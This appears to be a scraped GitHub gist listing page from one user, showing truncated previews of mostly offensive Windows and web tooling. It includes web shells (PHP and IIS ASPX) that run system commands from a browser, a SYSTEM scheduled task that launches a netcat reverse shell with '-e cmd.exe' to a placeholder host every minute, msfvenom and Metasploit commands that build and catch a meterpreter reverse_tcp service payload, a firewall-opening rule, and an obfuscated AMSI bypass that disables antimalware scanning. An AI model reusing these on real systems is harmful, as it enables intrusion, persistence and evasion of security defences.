@timsonner
timsonner / user-account-control-proeprties.md
Created February 22, 2025 05:59
UserAccountControl properties. Property, Hex, Decimal, Description.
| Property Flag | Value in Hexadecimal | Value in Decimal | Brief Description |
|---|---|---|---|
| SCRIPT | 0x0001 | 1 | The logon script will be run. |
| ACCOUNTDISABLE | 0x0002 | 2 | The user account is disabled. |
| HOMEDIR_REQUIRED | 0x0008 | 8 | The home folder is required. |
| LOCKOUT | 0x0010 | 16 | |
@timsonner
timsonner / php-shell-linux.md
Last active February 7, 2025 06:27
PHP, Javascript, HTML Non-Interactive web shell

PHP, Javascript, HTML non-interactive web shell

php-linux-shell.php

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Non-Interactive Shell</title>
    <script>
@timsonner
timsonner / powershell-http-fileserver.md
Last active February 1, 2025 23:00
Fileserver in PowerShell. Rough equivalent of python3 -m http.server...

PowerShell HTTP fileserver

Kick hole in firewall

New-NetFirewallRule -DisplayName "Open Port 8081" -Direction Inbound -Protocol TCP -LocalPort 8081 -Action Allow

PowerShell Http Server

# Define the directory to serve
@timsonner
timsonner / shell.aspx
Last active January 29, 2025 08:46
IIS PowerSnail Shell with pretty output. Spawn system processes from web browser...
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>PowerSnail Shell</title>
<style>
.output {
font-family: Consolas, "Courier New", monospace;
@timsonner
timsonner / modify-file-access-controls.md
Last active January 29, 2025 07:30
Modifying file access controls using PowerShell instead of 'takeown' and 'icacls'

Modify file Access Controls with PowerShell

# Take ownership of the file
$filePath = (Read-Host "Filepath")
$acl = Get-Acl -Path $filePath
$acl.SetOwner([System.Security.Principal.NTAccount]$(Read-Host "Username"))
Set-Acl -Path $filePath -AclObject $acl
Get-Acl -Path $filePath
@timsonner
timsonner / create-scheduled-task.md
Last active January 27, 2025 04:49
PowerShell. This way seems less wonky...

Creating a scheduled task with PowerShell

# Create scheduled task
$taskAction = New-ScheduledTaskAction -Execute "c:\tools\nc64" -Argument "-e cmd.exe x.x.x.x 4444"
$startTime = (Get-Date).AddMinutes(1)
$taskTrigger = New-ScheduledTaskTrigger -Once -At $startTime -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration ([TimeSpan]::FromDays(1))
$taskPrincipal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
$taskSettings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries
$task = New-ScheduledTask -Action $taskAction -Principal $taskPrincipal -Trigger $taskTrigger -Settings $taskSettings
Register-ScheduledTask -TaskName "Netcat-Scheduled-Task" -InputObject $task
@timsonner
timsonner / services.md
Last active January 27, 2025 03:27
Mostly they fuxor services with PowerShell, mostly...

Abusing services

Payload recipes

# Create service payload using MSFvenom (windows/x64/meterpreter/reverse_tcp)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f exe-service -o evil-service.exe

# Metasploit listener (windows/x64/meterpreter/reverse_tcp)
msfconsole -q -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_tcp;set LHOST x.x.x.x;set LPORT 4444;run"
@timsonner
timsonner / README.MD
Created December 22, 2024 18:26
Template for a new Repo!
@timsonner
timsonner / install-service.cs
Created November 24, 2024 19:02
Install a service using P/Invoke.
using System;
using System.Runtime.InteropServices;
class DriverServiceInstaller
{
const int SERVICE_KERNEL_DRIVER = 0x00000001;
const int SERVICE_DEMAND_START = 0x00000003;
const int SERVICE_ERROR_NORMAL = 0x00000001;
[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)]
@timsonner
timsonner / amsi-bypass.ps1
Created October 22, 2024 04:16
Obfuscated AMSI bypass. [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Create a reference to the assembly with further obfuscation
$randomPart = 'A' + 'msi' + 'Utils'
$ref = [Ref]
$asm = $ref.Assembly
$amsiType = $asm.GetType('System.' + 'Management.' + 'Automation.' + $randomPart)
# Prepare the field name in a more obfuscated way
$amsiFieldName = 'amsi' + 'Init' + 'Failed'
$amsiField = $amsiType.GetField($amsiFieldName, 'NonPublic, Static')